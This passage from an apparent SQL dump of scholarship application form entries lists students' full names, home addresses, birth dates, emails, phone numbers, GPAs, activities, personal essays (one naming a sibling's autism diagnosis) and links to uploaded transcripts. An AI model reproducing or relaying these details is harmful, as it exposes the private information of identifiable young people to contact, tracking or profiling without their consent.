goals.'),(4758,398,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/ZPHI-Avengers-Thanos-Essay.docx'),(4759,398,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/scan.pdf'),(4760,398,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/scan-2.pdf'),(4761,399,6,18.3,'Anjayooluwa'),(4762,399,6,18.6,'Adegboyo'),(4763,399,6,19.1,'5321 Briar Oak Court'),(4764,399,6,19.3,'Ellicott City'),(4765,399,6,19.4,'MD'),(4766,399,6,19.5,'21043'),(4767,399,6,19.6,'United States'),(4768,399,6,4,'02-15-02'),(4769,399,6,21,'jmiester.jayo@gmail.com'),(4770,399,6,20,'(240) 401-0653'),(4771,399,6,10,'Howard High School'),(4772,399,6,27,'Friend/Family Member'),(4773,399,6,28,'N/A'),(4774,399,6,9,'3.73'),(4775,399,6,26,'Biophysics (Pre-med)'),(4776,399,6,12,'4'),(4777,399,6,14,'Yes I hold membership in multiple academic clubs/organizations\r\n\r\n1. National Honors Society for 3 years, Member\r\n2. National Society of Black Engineers, Jr. for 3 years, Member\r\n3. Science National Honors Society for 3 years, Member\r\n4. Math Honors Society for 4 years, Member\r\n5. National Technical Honors Society for 4 years, Member'),(4778,399,6,13,'1. College Board AP Scholar with Distinction in 2019\r\n2. College Board AP Scholar in 2018\r\n3. Science Student of the Month, Howard High School, November 2018'),(4779,399,6,36,'1. University of Maryland Medical Center, Trauma Resuscitation Unit: aid nurses in getting supplies for nurses for admitted patients, support and observe status delivery from doctor to patients and family (November 2019 to Present)\r\n2. Howard County Library: sorted books for logical placement on shelf, signed children and student up for summer reading program, awarded prize for program completion (Summer 2018 and 2019)\r\n3. Rotary Club Elkridge: for the 55th and 56th Annual Bull and Oyster Roast, I setup tables with schedules/programs, solicited for raffle draw tickets, dressed and prepared tables and items for the night auction events, collected payments and provided receipt and change to auction winners, distributed paid auction items to winners (January 26, 2019 and January 25, 2020)\r\n4. Howard County Food Bank: provide shopping assistance to client, assist client with loading groceries into their cars, returned shopping carts into store, arranged and tidied store whenever products were moved (October 2018 to Present)\r\n5. Helping Up Mission: Served food to people with financial difficulties, who were trying to get back on their feet (July 21 and August 1, 2018)\r\n6. Community Baptist Church: selected coats, hats and gloves from Burlington Coat Factory to purchase for the needy, age 5-16 years, packaged food for the poor and needy, fed the poor and needy thanksgiving dinner (November 2017 to Present)\r\n7. Physics Tutoring: taught Physics C: Mechanics Concepts to physics students who faced difficulty with the class (September 2017 - Present)\r\n8. Alpha Achievers: as a member, provided mathematics tutoring to elementary and middle school students (September 2016-September 2017)'),(4780,399,6,37,'1. University of Maryland University College (UMBC)\r\n2. University of Maryland, College Park\r\n3. Central State University\r\n4. Waynesburg University'),(4781,399,6,40,'A prominent issue faced by students is the overwhelming amount of debt they accrue upon graduation. Additionally, many people, like my twin brother, have psychological and/or neurophysiological disorders that limit their career options. I want to dedicate my future to helping people young and old alike, so that they get a chance at societal and financial breakthroughs. \r\n\r\n	From a very young age, my twin brother, Jola, was diagnosed with a condition on the autism spectrum that limits his learning curve and ability to express himself to others. Due to his psychological disorder, my sister, my parents, and I have had to help him convey his feelings to others who may not understand Jola’s situation. Because I have lived most of my life with a loved one who was robbed of his chance at exploring his interest in everyday activities that most people take for granted, I want to help others in similar situations as Jola overcome the challenges they face. With my college education, I hope to begin conducting structured research that is geared toward helping treat people on the autism spectrum, and since I do not have much experience with research aside from personal research for the fun of it, having seniors and a faculty that have been through the process countless times will provide me resources to guide my research design and application. It is through doing this that I will be able to gain experience that will carry me into my goal of obtaining an MD/PhD in a degree pertaining to neurological biology.\r\n\r\n	I also would like to address the issue of students deciding to not pursue a certain career because they cannot afford the education required to obtain a degree in that desired career. A college education would equip me with the skillset required to handle this societal issue because I intend to learn important investment techniques from business classes and from people on campus who may be financially successful. By learning how to invest, I can grow my own finances to a significant level while developing a business to help treat people with psychological and/or neurophysiological disorders. With enough time, I would have enough money to support myself comfortably so I can develop a scholarship program and provide funds to as many people around the globe as possible to allow them work towards the goal of achieving their dreams.\r\n\r\n	Investing in my dreams not only helps me achieve my goals, but it also opens up the possibility to serve others. Through my efforts, I hope to help treat people with psychological and neurophysiological disorders like my twin brother Jola, so they do not have to limit their scope of success due to their disadvantages, and I intend to alleviate financial inconveniences to such individuals as well. This will not only help the bright minds of tomorrow, but also bring their talents a chance to help future innovative goals.'),(4782,399,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/ZPHI-Avengers-Thanos-Essay1.docx'),(4783,399,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/scan1.pdf'),(4784,399,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/scan-21.pdf'),(4785,400,6,18.3,'Anjayooluwa'),(4786,400,6,18.6,'Adegboyo'),(4787,400,6,19.1,'5321 Briar Oak Court'),(4788,400,6,19.3,'Ellicott City'),(4789,400,6,19.4,'MD'),(4790,400,6,19.5,'21043'),(4791,400,6,19.6,'United States'),(4792,400,6,4,'02-15-02'),(4793,400,6,21,'jmiester.jayo@gmail.com'),(4794,400,6,20,'(240) 401-0653'),(4795,400,6,10,'Howard High School'),(4796,400,6,27,'Friend/Family Member'),(4797,400,6,28,'N/A'),(4798,400,6,9,'3.73'),(4799,400,6,26,'Biophysics (Pre-med)'),(4800,400,6,12,'4'),(4801,400,6,14,'Yes I hold membership in multiple academic clubs/organizations\r\n\r\n1. National Honors Society for 3 years, Member\r\n2. National Society of Black Engineers, Jr. for 3 years, Member\r\n3. Science National Honors Society for 3 years, Member\r\n4. Math Honors Society for 4 years, Member\r\n5. National Technical Honors Society for 4 years, Member'),(4802,400,6,13,'1. College Board AP Scholar with Distinction in 2019\r\n2. College Board AP Scholar in 2018\r\n3. Science Student of the Month, Howard High School, November 2018'),(4803,400,6,36,'1. University of Maryland Medical Center, Trauma Resuscitation Unit: aid nurses in getting supplies for nurses for admitted patients, support and observe status delivery from doctor to patients and family (November 2019 to Present)\r\n2. Howard County Library: sorted books for logical placement on shelf, signed children and student up for summer reading program, awarded prize for program completion (Summer 2018 and 2019)\r\n3. Rotary Club Elkridge: for the 55th and 56th Annual Bull and Oyster Roast, I setup tables with schedules/programs, solicited for raffle draw tickets, dressed and prepared tables and items for the night auction events, collected payments and provided receipt and change to auction winners, distributed paid auction items to winners (January 26, 2019 and January 25, 2020)\r\n4. Howard County Food Bank: provide shopping assistance to client, assist client with loading groceries into their cars, returned shopping carts into store, arranged and tidied store whenever products were moved (October 2018 to Present)\r\n5. Helping Up Mission: Served food to people with financial difficulties, who were trying to get back on their feet (July 21 and August 1, 2018)\r\n6. Community Baptist Church: selected coats, hats and gloves from Burlington Coat Factory to purchase for the needy, age 5-16 years, packaged food for the poor and needy, fed the poor and needy thanksgiving dinner (November 2017 to Present)\r\n7. Physics Tutoring: taught Physics C: Mechanics Concepts to physics students who faced difficulty with the class (September 2017 - Present)\r\n8. Alpha Achievers: as a member, provided mathematics tutoring to elementary and middle school students (September 2016-September 2017)'),(4804,400,6,37,'1. University of Maryland University College (UMBC)\r\n2. University of Maryland, College Park\r\n3. Central State University\r\n4. Waynesburg University'),(4805,400,6,40,'A prominent issue faced by students is the overwhelming amount of debt they accrue upon graduation. Additionally, many people, like my twin brother, have psychological and/or neurophysiological disorders that limit their career options. I want to dedicate my future to helping people young and old alike, so that they get a chance at societal and financial breakthroughs. \r\n\r\n	From a very young age, my twin brother, Jola, was diagnosed with a condition on the autism spectrum that limits his learning curve and ability to express himself to others. Due to his psychological disorder, my sister, my parents, and I have had to help him convey his feelings to others who may not understand Jola’s situation. Because I have lived most of my life with a loved one who was robbed of his chance at exploring his interest in everyday activities that most people take for granted, I want to help others in similar situations as Jola overcome the challenges they face. With my college education, I hope to begin conducting structured research that is geared toward helping treat people on the autism spectrum, and since I do not have much experience with research aside from personal research for the fun of it, having seniors and a faculty that have been through the process countless times will provide me resources to guide my research design and application. It is through doing this that I will be able to gain experience that will carry me into my goal of obtaining an MD/PhD in a degree pertaining to neurological biology.\r\n\r\n	I also would like to address the issue of students deciding to not pursue a certain career because they cannot afford the education required to obtain a degree in that desired career. A college education would equip me with the skillset required to handle this societal issue because I intend to learn important investment techniques from business classes and from people on campus who may be financially successful. By learning how to invest, I can grow my own finances to a significant level while developing a business to help treat people with psychological and/or neurophysiological disorders. With enough time, I would have enough money to support myself comfortably so I can develop a scholarship program and provide funds to as many people around the globe as possible to allow them work towards the goal of achieving their dreams.\r\n\r\n	Investing in my dreams not only helps me achieve my goals, but it also opens up the possibility to serve others. Through my efforts, I hope to help treat people with psychological and neurophysiological disorders like my twin brother Jola, so they do not have to limit their scope of success due to their disadvantages, and I intend to alleviate financial inconveniences to such individuals as well. This will not only help the bright minds of tomorrow, but also bring their talents a chance to help future innovative goals.'),(4806,400,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/ZPHI-Avengers-Thanos-Essay2.docx'),(4807,400,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/scan2.pdf'),(4808,400,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/scan-22.pdf'),(4809,401,6,18.3,'Anjayooluwa'),(4810,401,6,18.6,'Adegboyo'),(4811,401,6,19.1,'5321 Briar Oak Court'),(4812,401,6,19.3,'Ellicott City'),(4813,401,6,19.4,'MD'),(4814,401,6,19.5,'21043'),(4815,401,6,19.6,'United States'),(4816,401,6,4,'02-15-02'),(4817,401,6,21,'jmiester.jayo@gmail.com'),(4818,401,6,20,'(240) 401-0653'),(4819,401,6,10,'Howard High School'),(4820,401,6,27,'Friend/Family Member'),(4821,401,6,28,'N/A'),(4822,401,6,9,'3.73'),(4823,401,6,26,'Biophysics (Pre-med)'),(4824,401,6,12,'4'),(4825,401,6,14,'Yes I hold membership in multiple academic clubs/organizations\r\n\r\n1. National Honors Society for 3 years, Member\r\n2. National Society of Black Engineers, Jr. for 3 years, Member\r\n3. Science National Honors Society for 3 years, Member\r\n4. Math Honors Society for 4 years, Member\r\n5. National Technical Honors Society for 4 years, Member'),(4826,401,6,13,'1. College Board AP Scholar with Distinction in 2019\r\n2. College Board AP Scholar in 2018\r\n3. Science Student of the Month, Howard High School, November 2018'),(4827,401,6,36,'1. University of Maryland Medical Center, Trauma Resuscitation Unit: aid nurses in getting supplies for nurses for admitted patients, support and observe status delivery from doctor to patients and family (November 2019 to Present)\r\n2. Howard County Library: sorted books for logical placement on shelf, signed children and student up for summer reading program, awarded prize for program completion (Summer 2018 and 2019)\r\n3. Rotary Club Elkridge: for the 55th and 56th Annual Bull and Oyster Roast, I setup tables with schedules/programs, solicited for raffle draw tickets, dressed and prepared tables and items for the night auction events, collected payments and provided receipt and change to auction winners, distributed paid auction items to winners (January 26, 2019 and January 25, 2020)\r\n4. Howard County Food Bank: provide shopping assistance to client, assist client with loading groceries into their cars, returned shopping carts into store, arranged and tidied store whenever products were moved (October 2018 to Present)\r\n5. Helping Up Mission: Served food to people with financial difficulties, who were trying to get back on their feet (July 21 and August 1, 2018)\r\n6. Community Baptist Church: selected coats, hats and gloves from Burlington Coat Factory to purchase for the needy, age 5-16 years, packaged food for the poor and needy, fed the poor and needy thanksgiving dinner (November 2017 to Present)\r\n7. Physics Tutoring: taught Physics C: Mechanics Concepts to physics students who faced difficulty with the class (September 2017 - Present)\r\n8. Alpha Achievers: as a member, provided mathematics tutoring to elementary and middle school students (September 2016-September 2017)'),(4828,401,6,37,'1. University of Maryland University College (UMBC)\r\n2. University of Maryland, College Park\r\n3. Central State University\r\n4. Waynesburg University'),(4829,401,6,40,'A prominent issue faced by students is the overwhelming amount of debt they accrue upon graduation. Additionally, many people, like my twin brother, have psychological and/or neurophysiological disorders that limit their career options. I want to dedicate my future to helping people young and old alike, so that they get a chance at societal and financial breakthroughs. \r\n\r\n	From a very young age, my twin brother, Jola, was diagnosed with a condition on the autism spectrum that limits his learning curve and ability to express himself to others. Due to his psychological disorder, my sister, my parents, and I have had to help him convey his feelings to others who may not understand Jola’s situation. Because I have lived most of my life with a loved one who was robbed of his chance at exploring his interest in everyday activities that most people take for granted, I want to help others in similar situations as Jola overcome the challenges they face. With my college education, I hope to begin conducting structured research that is geared toward helping treat people on the autism spectrum, and since I do not have much experience with research aside from personal research for the fun of it, having seniors and a faculty that have been through the process countless times will provide me resources to guide my research design and application. It is through doing this that I will be able to gain experience that will carry me into my goal of obtaining an MD/PhD in a degree pertaining to neurological biology.\r\n\r\n	I also would like to address the issue of students deciding to not pursue a certain career because they cannot afford the education required to obtain a degree in that desired career. A college education would equip me with the skillset required to handle this societal issue because I intend to learn important investment techniques from business classes and from people on campus who may be financially successful. By learning how to invest, I can grow my own finances to a significant level while developing a business to help treat people with psychological and/or neurophysiological disorders. With enough time, I would have enough money to support myself comfortably so I can develop a scholarship program and provide funds to as many people around the globe as possible to allow them work towards the goal of achieving their dreams.\r\n\r\n	Investing in my dreams not only helps me achieve my goals, but it also opens up the possibility to serve others. Through my efforts, I hope to help treat people with psychological and neurophysiological disorders like my twin brother Jola, so they do not have to limit their scope of success due to their disadvantages, and I intend to alleviate financial inconveniences to such individuals as well. This will not only help the bright minds of tomorrow, but also bring their talents a chance to help future innovative goals.'),(4830,401,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/ZPHI-Avengers-Thanos-Essay3.docx'),(4831,401,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/scan3.pdf'),(4832,401,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/scan-23.pdf'),(4833,402,6,18.3,'Noni'),(4834,402,6,18.6,'Grimes'),(4835,402,6,19.1,'8532 Harvest View Ct.'),(4836,402,6,19.3,'Ellicott City'),(4837,402,6,19.4,'MD'),(4838,402,6,19.5,'21043'),(4839,402,6,19.6,'United States'),(4840,402,6,4,'11-19-02'),(4841,402,6,21,'nonigrimes@gmail.com'),(4842,402,6,20,'(410) 371-5554'),(4843,402,6,10,'Centennial High School'),(4844,402,6,27,'Friend/Family Member'),(4845,402,6,28,'N/A'),(4846,402,6,9,'3.6'),(4847,402,6,26,'Film Media Studies'),(4848,402,6,12,'N/A'),(4849,402,6,14,'- Field Hockey / Centennial High School  /  Co-Captain  /  2017-2018\r\n- Brothers and Sisters in Christ / Centennial High School  /  Executive Board Member  /  2019-present\r\n- Girl for Girl / Centennial High School  /  Founder and President  /  2017 - Present\r\n- Delta Scholar / Centennial High School  /  Volunteer Coordinator  /  2018 - 2019\r\n- Delta Scholar / Centennial High School  /  Co-President  /  2019 - Present\r\n- National Arts Honor Society / Centennial High School  /  Art Director /  2018 - 2019\r\n- National Arts Honor Society / Centennial High School  /  Director of Operations  /  2019 - Present'),(4850,402,6,13,'2016 - 2017, 2017 - 2018, 2018 - 2019, 2019 - 2020, Centennial High School Honor Roll\r\n2018  Student of the Month | Centennial High School\r\n2019  Howard County Public School System Visual Arts Exhibit in Whiteford, Taylor & Preston LLP law office  (work exhibited for a 2 months)\r\n2019  Congressional Art Show | Finalist & Baltimore Museum of Art Curator Award Winner\r\n2019  The Reginald F. Lewis Museum High School Juried Art Showcase | Finalist  (work exhibited for a 1 month)\r\n2019  Howard County NAACP ACT-SO | Gold Medalist in Drawing and Painting\r\n2018  Student of the Month | Centennial High School\r\n2020  January Student of the Month | Centennial High School\r\n2020  The Reginald F. Lewis Museum High School Juried Art Showcase | 2nd Place Winner  (work currently displayed at the museum)'),(4851,402,6,36,'- during the summer of 2017, volunteered a a Junior Camp Counselor at three one-week summer camps run by Howard County Recreation and Parks \r\n- during the summer of 2018, volunteered as a Classroom Assistant at the Summer Institute, a preparatory summer program run by the Howard County Public School System Black Student Achievement Program'),(4852,402,6,37,'Howard University\r\nEmerson College'),(4853,402,6,38,'I have always been captivated by the moving marvel that is film, but it’s tremendous capacity to connect with others and change perspectives influenced my desire to be a filmmaker. Like Margo Lee Shetterly, I seek to challenge the narrow space in which literature, art, and media has traditionally allowed women and people of color to exist within. As a black female who was almost always in the minority, I often felt pressured to either become my stereotype or exhaust myself running from it, finding little solace in the limited representations of people who looked like me or shared my struggle. In recent years, I have realized that my race and gender does not limit me to one way of life. I have also come to know that the conflict between identity and conformity is a universal theme, particularly for people of color, that I want to explore and help others deal with. I do not wish to reduce us to caricatures nor idealize us, ignore our pain and history nor let that define us, but to allow us to see our endless potential for both beauty and ugliness. \r\n\r\nAs an artist who thrives off community, freedom, and challenge, I have applied to colleges and universities I felt would help me develop my artistic voice, grow my storytelling skills, and give me the freedom to experiment. Though I have not made my final decision on which institution I will attend, I want to major in film and minor in African American studies and gender studies. Such an education will not only provide me with the skills and connections to succeed in my field, but also a better understanding of my society that will help me to tell compelling stories that reframe our perspectives on race and gender. By learning to alter the images and tropes that we consume, I hope affect social change through my films. \r\n\r\nAdditionally, an in-depth understanding of the historical circumstances for various current issues as well as how to connect with others through digital media not only has an application in my intended career, but will also help me to be a better citizen and serve my community more effectively and creatively. Just as I have become highly involved in a variety of community-based extracurriculars throughout my high school career, I plan to both continue my existing efforts and look for new opportunities to lead and serve my community within and beyond my university. I greatly appreciate the sacrifices that my ancestors and family made to ensure my ability to attend college and I will make the most of my education, not only for myself, but for the society and community to which I must pay my spiritual rent.'),(4854,402,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Grimes_Essay.pdf'),(4855,402,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Grimes_Transcript.pdf'),(4856,402,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Grimes_Release-form.pdf'),(4857,403,6,18.3,'Erin'),(4858,403,6,18.6,'Richardson'),(4859,403,6,19.1,'7296 Elkridge Crossing Way'),(4860,403,6,19.3,'Elkridge'),(4861,403,6,19.4,'Maryland'),(4862,403,6,19.5,'21075'),(4863,403,6,19.6,'United States'),(4864,403,6,4,'02/20/02'),(4865,403,6,21,'erinrichardson20@gmail.com'),(4866,403,6,20,'(301) 547-1473'),(4867,403,6,10,'Howard High School'),(4868,403,6,27,'Friend/Family Member'),(4869,403,6,28,'N/A'),(4870,403,6,9,'3.33'),(4871,403,6,26,'Business Adminstration'),(4872,403,6,12,'NA'),(4873,403,6,14,'• BSU - Black Student Union member (4 years)\r\n▪ Participate in cultural and educational events/activities for the student population. \r\n• Delta Scholars – Delta Sigma Theta Sorority, Incorporated.  (2 years)\r\n▪ Participate in community service projects while learning the responsibilities of being a young woman in society\r\n• ASA/African Student Association – Vice President  (2 years)\r\n▪ Create awareness and education about the diverse African cultural traditions to the student population. \r\n▪ Co-Lead Producer and Coordinator of Program organizing the production and performances. \r\n\r\n• Inducted into the National Honor Society.  (1 year)'),(4874,403,6,13,'• Principal’s Honor Roll school letter for four consecutive years in high school. \r\n• Creative writing assignment from 10th grade English teacher was presented to the English Department Administration in August 2019 and chosen to use as a template in the English Department curriculum for all 10th grade students in the high school.'),(4875,403,6,36,'• Teacher’s Aide for 10th grade English teacher, Mrs. McManus. (1 year)\r\n• Assistant to 11th grade English teacher, Ms. Kelly, with class assignments and activities. (2 years)\r\n• Home Assistance to Senior Citizens and provide food for random homeless in the streets. (since middle school)\r\n• Youth Ministry Teacher for Toddlers at Celebration Church Columbia, Maryland. (2 Years)\r\n• Collect household items and clothing from family and friends to donate to National Children’s, Lupus Foundations and American Veteran’s (AMVET).  (since middle school)'),(4876,403,6,37,'1. Florida A&M University\r\n2.North Carolina A&T University\r\n3. Xavier University of Louisianna \r\n4. Howard University'),(4877,403,6,38,'Like Katherine Johnson in Hidden Figures, I knew what I wanted to be at a young age. When I was in middle school, there was an opportunity to watch a television series called The Men Who Built America. My curiosity hit, and I signed up to watch it and fell in love with the show. I believe that’s when my interest in business and industry started. I’m one of the lucky ones who knew from a young age what they wanted to do. I knew that I could do anything I wanted to do, something that benefitted me. because I knew that I was a leader or I at least aspired to be one. Watching that show opened my eyes to the business world, and yes dreaming of being the next Rockefeller or Carnegie is outlandish, yet learning how they built themselves from the ground up inspired me to try and find something that I could build up and make my own. A business major gives me the knowledge and tools to accomplish such dreams. I plan to further my education and go for my master\'s degree because even if I don’t make it big in the business world at least I’ll have a step up compared to other people. To make sure that business is actually something that I wanted to do, I took an intro to business class in my junior year of high school. I had an amazing teacher who was very knowledgeable and made me positive that this was the path for me. I consistently received good grades in that class as well because it piqued my interest. I wanted to do well in there, so I did everything I could to know the material and put in the effort on assignments. I can’t picture myself doing anything else outside of the business world. There’s a lot of opportunity in the business world especially as a higher up to give back to the community. I wish I could provide a definitive answer as to how I would give back to the community, but I’m not sure yet because I don’t know who will hire me and what that company does. I grew up believing that when you do something it has to have a purpose. I still believe to this day more now than before because everything you do affects you and I want what I do to affect others. I want it to uplift them. I want my contribution to my community through my career to better them and for them to know that I’m trying to improve their lives. I want my community, my people to know that I’m there for them. I will advocate for them. I will represent them with every choice I make.'),(4878,403,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Richardson-Erin-Janelle-Official-Howard-High-School-Transcript.pdf'),(4879,403,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Signed-ZPB-Photo-Release-Form.pdf'),(4880,403,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/recommendation_erin_richardson_SCHOLARSHIP-Volunteer-Camp-Counselor.docx'),(4881,404,6,18.3,'Kennedy'),(4882,404,6,18.6,'Offley'),(4883,404,6,19.1,'5334 Kerger Rd'),(4884,404,6,19.3,'Ellicott City'),(4885,404,6,19.4,'MD'),(4886,404,6,19.5,'21043'),(4887,404,6,19.6,'United States'),(4888,404,6,4,'09-08-01'),(4889,404,6,21,'kennedyoffley@gmail.com'),(4890,404,6,20,'(443) 510-8654'),(4891,404,6,10,'Howard High School'),(4892,404,6,27,'Other'),(4893,404,6,28,'Parent'),(4894,404,6,9,'3.52'),(4895,404,6,26,'psychology'),(4896,404,6,12,'NA'),(4897,404,6,14,'I am the president of the Habitat for Humanity club (2019-current) and have been a member for one year prior. I am a member of the Black Student Union (2018-2020). I am a member of the National Honor Society (2019-current) and Spanish Honor Society (2018-current). Also, I am a member of Delta Scholars (2019-current). In addition, I participated in the Key Club (2017) as a member.'),(4898,404,6,13,'I have received honor roll every quarter sophomore and junior year. I have also been awarded with Black student achievement for having high grades as a minority student.'),(4899,404,6,36,'I served as a member of the jury and foreperson for teen court hearing juvenile cases and deciding the proper disposition (2018-2019). I care for elders with mental illnesses while family is away by supervising their activity, providing meals, and completing necessary exercises (2019-current).'),(4900,404,6,37,'My top college choice is Pennsylvania State University, University Park. My other options include University of Maryland (College Park), Virginia Tech, and James Madison University.'),(4901,404,6,39,'The category I would choose in Jeopardy would be \"Black Excellence.\" I am passionate about this subject because it motivates me to work hard and reach my full potential. I hold black excellence in high regard because of the various obstacles black people endure solely because of the color of their skin. I believe it is important to learn about the achievements of the black community in order to teach young, black children’s minds early on that no barrier is unconquerable. Growing up as a young, African American woman it is not uncommon to feel overshadowed as a minority. My interest in this category stemmed from learning fascinating stories about African Americans that have made great achievements despite the turbulence they have faced. I am intrigued to learn about more success stories because they helped me see the potential success in myself.\r\nThere are various success stories of African Americans, but one under-publicized story about an African American female has exemplified black excellence to me. Katherine Johnson was a black female mathematician that was responsible for calculating mechanics for NASA. For over three decades, Ms. Johnson calculated the flight paths for multiple spacecraft including the first U.S astronaut in space, Freedom 7. Her calculations would dictate the success of the mission and if the numbers were off, astronauts could have lost their lives. Astronauts were willing to place their lives in Ms. Johnson\'s hands based on her calculations to the exclusion of other mathematicians. Johnson’s work began in 1953 when she served in a group of African American women known as the West Computers for the National Advisory Committee for Aeronautics. The group of women completed their calculations manually and analyzed test data. Katherine Johnson along with Dorothy Vaughan, Mary Jackson, exemplify the message that worth and intelligence is not limited by race or gender. During that time, it was the age of Jim Crow when she began working for NASA. Johnson’s story influenced my interest in studying STEM in college. Only 7.2% of women worked full-time in male-dominated occupations as stated by The Institute for Women’s Policy Research (2018). Though STEM is a male dominated field, Johnson and other leading, black figures like her have greatly motivated me to make great strides without feeling limited by race. Today, knowing these women were the backbone to the success of the first U.S. crewed space flights serves as motivation for minorities like myself to explore our power and be high achieving because we are more than capable. Johnson exemplifies the message that excellence and intelligence is not limited by race or gender. I am very passionate about learning more about black excellence because it has set the precedent for me that I am capable of anything despite the challenges that I may face. Therefore, I hold challenging stories in high regard due to the various obstacles black individuals have to overcome in order to be successful.'),(4902,404,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/grades.pdf'),(4903,404,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/LGZScholarshipReleaseForm-1.pdf'),(4904,404,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Resume-KO.docx'),(4905,405,6,18.3,'Allison'),(4906,405,6,18.6,'Alston'),(4907,405,6,19.1,'8723 Cresthill Ct'),(4908,405,6,19.3,'Laurel'),(4909,405,6,19.4,'Maryland'),(4910,405,6,19.5,'20723-2708'),(4911,405,6,19.6,'United States'),(4912,405,6,4,'05-27-02'),(4913,405,6,21,'aalston255@gmail.com'),(4914,405,6,20,'(410) 599-0209'),(4915,405,6,10,'Reservoir High School'),(4916,405,6,27,'Friend/Family Member'),(4917,405,6,28,'N/A'),(4918,405,6,9,'3.7'),(4919,405,6,26,'International studies, Education'),(4920,405,6,12,'10 credit hours  through Dual Enrollment HCPSS/HCC'),(4921,405,6,14,'Gator Chapel, Reservoir High School (RHS), 6 months, Founder and Facilitator\r\nFuture Business Leaders of America, RHS, 1 year, Chief Public Relations Officer and Director of Event Planning \r\nTri-M National Music Honor Society, RHS Chapter, 4 years, 2 years as President \r\nFrench Tutor, Independent Activity with students at RHS, 2 years\r\nRHS Orchestra, 4 years, Section Leader, cello for 2 years\r\nRHS Chamber Orchestra, 2 years, Section Leader and Principal cellist (1 year)\r\nDelta Scholars RHS Chapter, 2 years, member and mentor\r\nRHS Women\'s Choir, 3 years, member\r\nRHS Black Student Union, 4 years, Discussion facilitator and Event Planner (1 year)\r\n RHS Junior Varsity Boys Basketball, Winter 2018, manager\r\n RHS Junior Varsity Girls Soccer, Fall 2017, manager\r\nRHS Varsity Girls Lacrosse, Spring 2018- Present, manager'),(4922,405,6,13,'Howard County Martin Luther King Jr. Essay Contest  2019, 1st Place\r\nNational Honor Society, Winter 2019 to present\r\nNational Science Honor Society, Fall 2018-Present\r\nRHS Principal’s Honor Roll, Fall 2016 to Present\r\nNAACP of Howard County Young Trailblazer Award, Spring 2018 \r\nPoetry Out Loud Competition, RHS, 1st Runner Up, Winter 2018 \r\nTri-M National Music Honor Society, Spring 2017\r\nOmega Psi Phi Fraternity, Tau Pi Chapter Talent Hunt, Spoken Word Award, Spring 2017 \r\nNational History Day (The Stand it Took to Stand on the Moon): Howard County, 1st Place, Maryland State Competition, 2nd Place, National Finalist 2017\r\nNational History Day (Train Ticket to Revolution):  Howard County, 2nd Place, Maryland State Competition, 2nd Place, National Finalist 2016'),(4923,405,6,36,'Howard County Board of Education, Student Member of the Board of Education, 1 year term SY 2019-2020\r\nThe Council of Elders of the Black Community of Howard County Youth board member, Spring 2018- Fall 2019\r\nHoward County Superintendent\'s  Advisory Committee on Diversity, Equity, and Inclusion, Various dates 2018-2019 School Year\r\nWBAL Concert for Kids Campaign, Cellist, November and December 2018\r\nSt John Baptist Church Decoded Praise Choir, Chaplain,  Fall 2017-Present\r\nPeople Acting Together in Howard (PATH) Community Speaker, Various dates and events from Spring 2017-Fall 2019 \r\nReservoir Music Department Adopt-A-Family and Toy Drive, December 2017, 2018, 2019\r\nReservoir Music Department Food Drive, Fall 2017, 2018, 2019\r\nSoccer Association of Columbia, Premier Travel Team, 2016, 2017, 2018'),(4924,405,6,37,'Towson University\r\nUniversity of Virginia'),(4925,405,6,40,'Essay C. In the movie Avengers: The End Game, the Avengers must defeat Thanos the evil demigod. What societal issue(s) do you most want to defeat (or help address) and how might a college education best equip you to engage in the issue(s)?\r\n \r\nOver 150 countries across the world currently have actively sexist laws against women. Inequality is being institutionalized across the globe, although we appear to fight against it in developed countries such as the United States. While we constantly hear about the progress being made, we neglect to recognize the perils that our neighbors face. While I am in the process of completing my college education, as well as upon completion of my college career, I will bring light to the issues that women and children face, and fight for equal protection and rights under the law, despite the progress we have shown domestically for equality. \r\n\r\n\r\nI carry the passion and drive to better my world, and the world of others, but this is not something I can do alone. With the assistance of this scholarship, I will be afforded the opportunity to embrace internships and mentorships at whichever institution I decide to attend. Through the connections I make in college, women and children will no longer be ignored, and given the resources they need to succeed. For example, I see myself leading school supply drives, raising awareness about women’s issues through public speaking and writing articles for publications, and working with public officials.  As the first person in my family to hold elected office, as the Student Member of the Board of Education, it is my duty to speak for those 